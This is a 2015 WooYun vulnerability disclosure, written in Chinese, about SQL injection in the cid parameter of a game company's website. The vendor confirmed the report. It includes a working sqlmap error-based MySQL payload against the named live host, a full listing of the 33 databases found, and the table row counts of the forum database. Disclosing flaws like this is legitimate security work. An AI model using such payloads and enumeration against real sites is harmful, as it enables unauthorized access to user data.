当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166430

漏洞标题:英雄互娱SQL注入(33库涉及旗下几乎所有游戏数据库包含各种游戏激活码等)

相关厂商:英雄互娱

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-12-31 15:58

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-31: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

233333333

详细说明:

http://ttx5.yingxiong.com/m/list.html?cid=*
参数cid 可注入

0.png


1.png


几乎囊括了旗下所有游戏 的数据库
BBS数据库

7.png


2.png


全名枪战

3.png


迷你刀塔:

4.png


5.png


club数据库:

6.png


8.png


其他的就不一一列举了

漏洞证明:

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2031 HTTP(s)
requests:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: http://ttx5.yingxiong.com:80/m/list.html?cid=-7296) OR 1 GROUP BY C
ONCAT(0x716b767171,(SELECT (CASE WHEN (6156=6156) THEN 1 ELSE 0 END)),0x7162706b
71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
[15:24:48] [INFO] testing MySQL
[15:24:49] [INFO] confirming MySQL
[15:24:49] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[15:24:49] [INFO] fetching database names
[15:24:49] [INFO] the SQL query used returns 33 entries
[15:24:49] [INFO] starting 10 threads
[15:24:50] [INFO] retrieved: information_schema
[15:24:50] [INFO] retrieved: cayx
[15:24:50] [INFO] retrieved: cayxcms
[15:24:50] [INFO] retrieved: dgl_zykj
[15:24:50] [INFO] retrieved: club
[15:24:50] [INFO] retrieved: gwlr
[15:24:50] [INFO] retrieved: game
[15:24:50] [INFO] retrieved: ccz
[15:24:50] [INFO] retrieved: gongfu
[15:24:50] [INFO] retrieved: ifsgcms
[15:24:50] [INFO] retrieved: js
[15:24:51] [INFO] retrieved: jntjcms
[15:24:51] [INFO] retrieved: mndt
[15:24:51] [INFO] retrieved: gd_zykj
[15:24:51] [INFO] retrieved: qjsn
[15:24:51] [INFO] retrieved: mysql
[15:24:51] [INFO] retrieved: bbs
[15:24:51] [INFO] retrieved: fnkjcms
[15:24:51] [INFO] retrieved: ttx5
[15:24:51] [INFO] retrieved: ttyxyx
[15:24:51] [INFO] retrieved: qtdlcms
[15:24:51] [INFO] retrieved: mxywk
[15:24:51] [INFO] retrieved: xsg
[15:24:52] [INFO] retrieved: process
[15:24:52] [INFO] retrieved: xmcms
[15:24:52] [INFO] retrieved: performance_schema
[15:24:52] [INFO] retrieved: sqbb
[15:24:52] [INFO] retrieved: yingxiong
[15:24:52] [INFO] retrieved: yxcms
[15:24:52] [INFO] retrieved: ttx5yx
[15:24:52] [INFO] retrieved: zycx
[15:24:52] [INFO] retrieved: we
[15:24:52] [INFO] retrieved: xsgcms
available databases [33]:
[*] bbs
[*] cayx
[*] cayxcms
[*] ccz
[*] club
[*] dgl_zykj
[*] fnkjcms
[*] game
[*] gd_zykj
[*] gongfu
[*] gwlr
[*] ifsgcms
[*] information_schema
[*] jntjcms
[*] js
[*] mndt
[*] mxywk
[*] mysql
[*] performance_schema
[*] process
[*] qjsn
[*] qtdlcms
[*] sqbb
[*] ttx5
[*] ttx5yx
[*] ttyxyx
[*] we
[*] xmcms
[*] xsg
[*] xsgcms
[*] yingxiong
[*] yxcms
[*] zycx
[15:24:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2074 times
[15:24:52] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\ttx5.yingxiong.com'
[*] shutting down at 15:24:52


BBS数据库:

Database: bbs
+--------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------+---------+
| pre_thread_ip_log | 881859 |
| pre_home_notification | 243062 |
| pre_forum_post | 205318 |
| pre_forum_threadpartake | 123896 |
| pre_forum_thread | 107231 |
| pre_home_pokearchive | 92029 |
| pre_ucenter_memberfields | 81304 |
| pre_ucenter_members | 81304 |
| pre_common_member_newprompt | 78831 |
| pre_forum_thread_moderate | 71770 |
| pre_common_credit_rule_log | 69218 |
| pre_forum_threadlog | 67670 |
| pre_common_member_count_archive | 63811 |
| pre_common_member_field_forum_archive | 63811 |
| pre_common_member_field_home_archive | 63811 |
| pre_common_member_profile_archive | 63811 |
| pre_common_member_status_archive | 63811 |
| pre_common_member_archive | 63803 |
| pre_common_district | 45051 |
| pre_forum_statlog | 42148 |
| pre_common_onlinetime | 26151 |
| pre_plugin_auction_message | 25162 |
| pre_forum_hotreply_member | 23994 |
| pre_forum_sofa | 20724 |
| pre_home_poke | 20387 |
| pre_common_credit_log_field | 18673 |
| pre_common_credit_log | 18561 |
| pre_fx_checkin_log | 18459 |
| pre_forum_threadmod | 17677 |
| pre_common_member_status | 17499 |
| pre_common_member_count | 17498 |
| pre_common_member_field_forum | 17498 |
| pre_common_member_field_home | 17498 |
| pre_common_member_profile | 17498 |
| pre_common_member | 17496 |
| pre_common_connect_guest | 14393 |
| pre_fx_checkin | 13377 |
| pre_plugin_auctionapply | 12873 |
| pre_connect_memberbindlog | 9414 |
| pre_forum_newthread | 9139 |
| pre_common_member_connect | 9050 |
| pre_forum_attachment | 7939 |
| pre_forum_post_moderate | 6047 |
| pre_forum_modwork | 5881 |
| pre_mobile_wsq_threadlist | 5599 |
| pre_forum_pollvoter | 5283 |
| pre_forum_polloption | 4837 |
| pre_ucenter_pm_members | 4744 |
| pre_ucenter_pm_indexes | 4603 |
| pre_common_member_crime | 3997 |
| pre_forum_attachment_unused | 2470 |
| pre_ucenter_pm_lists | 2412 |
| pre_forum_postlog | 2292 |
| pre_home_favorite | 2154 |
| pre_fx_checkin_rates | 2000 |
| pre_forum_poll | 1901 |
| pre_txz | 1886 |
| pre_common_credit_rule_log_field | 1883 |
| pre_common_word | 1755 |
| pre_forum_threadimage | 1635 |
| pre_home_friend | 1580 |
| pre_common_member_action_log | 1325 |
| pre_forum_filter_post | 1261 |
| pre_home_friend_request | 1251 |
| pre_forum_logs | 907 |
| pre_security_evilpost | 894 |
| pre_ucenter_newpm | 833 |
| pre_common_block_pic | 830 |
| pre_common_stat | 806 |
| pre_home_friendlog | 794 |
| pre_forum_postcomment | 709 |
| pre_plugin_lj_sina | 667 |
| pre_forum_attachment_4 | 642 |
| pre_forum_attachment_9 | 635 |
| pre_forum_post_tableid | 634 |
| pre_forum_attachment_8 | 568 |
| pre_forum_attachment_2 | 540 |
| pre_forum_attachment_7 | 528 |
| pre_forum_attachment_6 | 523 |
| pre_forum_attachment_5 | 519 |
| pre_ucenter_pm_messages_4 | 513 |
| pre_forum_attachment_1 | 512 |
| pre_common_stylevar | 499 |
| pre_forum_attachment_0 | 498 |
| pre_forum_attachment_3 | 490 |
| pre_ucenter_pm_messages_2 | 488 |
| pre_ucenter_pm_messages_6 | 484 |
| pre_ucenter_pm_messages_7 | 479 |
| pre_ucenter_pm_messages_0 | 467 |
| pre_forum_threadclass | 465 |
| pre_ucenter_pm_messages_5 | 459 |
| pre_ucenter_pm_messages_9 | 452 |
| pre_common_setting | 449 |
| pre_forum_rsscache | 441 |
| pre_ucenter_pm_messages_8 | 430 |
| pre_ucenter_pm_messages_3 | 416 |
| pre_ucenter_pm_messages_1 | 406 |
| pre_security_eviluser | 401 |
| pre_forum_threaddisablepos | 332 |
| pre_forum_hotreply_number | 267 |
| pre_common_syscache | 262 |
| pre_common_smiley | 195 |
| pre_common_statuser | 162 |
| pre_common_block_item | 127 |
| pre_common_block_style | 104 |
| pre_common_session | 103 |
| pre_home_follow | 97 |
| pre_common_tag | 94 |
| pre_plugin_auction | 94 |
| pre_forum_postcache | 82 |
| pre_common_admincp_perm | 79 |
| pre_ucenter_badwords | 78 |
| pre_forum_forumfield | 72 |
| pre_forum_forum | 71 |
| pre_common_pluginvar | 68 |
| pre_common_cache | 61 |
| pre_common_member_grouppm | 53 |
| pre_common_member_profile_setting | 51 |
| pre_common_nav | 51 |
| pre_forum_threadhot | 47 |
| pre_home_favorite_del | 47 |
| pre_forum_polloption_image | 46 |
| pre_forum_moderator | 45 |
| pre_forum_threadcalendar | 39 |
| pre_common_block | 38 |
| pre_common_credit_rule | 33 |
| pre_common_report | 29 |
| pre_common_regip | 28 |
| pre_forum_medallog | 28 |
| pre_ucenter_settings | 27 |
| pre_common_plugin | 24 |
| pre_forum_replycredit | 24 |
| pre_common_usergroup | 22 |
| pre_common_usergroup_field | 22 |
| pre_connect_postfeedlog | 22 |
| pre_connect_feedlog | 21 |
| pre_common_cron | 20 |
| pre_common_member_medal | 17 |
| pre_home_click | 15 |
| pre_forum_medal | 11 |
| pre_common_admincp_cmenu | 9 |
| pre_common_grouppm | 8 |
| pre_common_optimizer | 8 |
| pre_forum_warning | 8 |
| pre_common_admingroup | 7 |
| pre_common_process | 7 |
| pre_common_word_type | 6 |
| pre_forum_imagetype | 6 |
| pre_forum_onlinelist | 6 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_common_style | 5 |
| pre_common_template | 5 |
| pre_myrepeats | 5 |
| pre_forum_bbcode | 4 |
| pre_lev_sign | 4 |
| pre_lev_sign_user | 4 |
| pre_common_failedip | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_poststick | 3 |
| pre_forum_threadpreview | 3 |
| pre_home_follow_feed_archiver | 3 |
| pre_common_advertisement_custom | 2 |
| pre_common_diy_data | 2 |
| pre_common_plugin_cnzz_user | 2 |
| pre_common_plugin_cnzztongji | 2 |
| pre_common_template_block | 2 |
| pre_fx_checkin_con | 2 |
| pre_mobile_setting | 2 |
| pre_study_daily_attendance | 2 |
| pre_study_daily_attendance_continuous_sign | 2 |
| pre_ucenter_failedlogins | 2 |
| pre_common_admincp_session | 1 |
| pre_common_block_xml | 1 |
| pre_common_failedlogin | 1 |
| pre_common_mailqueue | 1 |
| pre_common_member_secwhite | 1 |
| pre_common_secquestion | 1 |
| pre_common_tagitem | 1 |
| pre_forum_spacecache | 1 |
| pre_forum_threadprofile | 1 |
| pre_forum_threadtype | 1 |
| pre_plugin_auction_xml | 1 |
| pre_security_failedlog | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_applications | 1 |
| pre_ucenter_notelist | 1 |
+--------------------------------------------+---------+
[15:29:10] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 646 times
[15:29:10] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\ttx5.yingxiong.com'
[*] shutting down at 15:29:10


修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-04 17:38

厂商回复:

的确是我们的疏忽,相关人员已经被处理,非常感谢!

最新状态:

暂无


漏洞评价:

评价

  1. 2015-12-31 16:48 | mango ( 核心白帽子 | Rank:1868 漏洞数:275 | 出一份微不足道的"力")

    i 这个域名??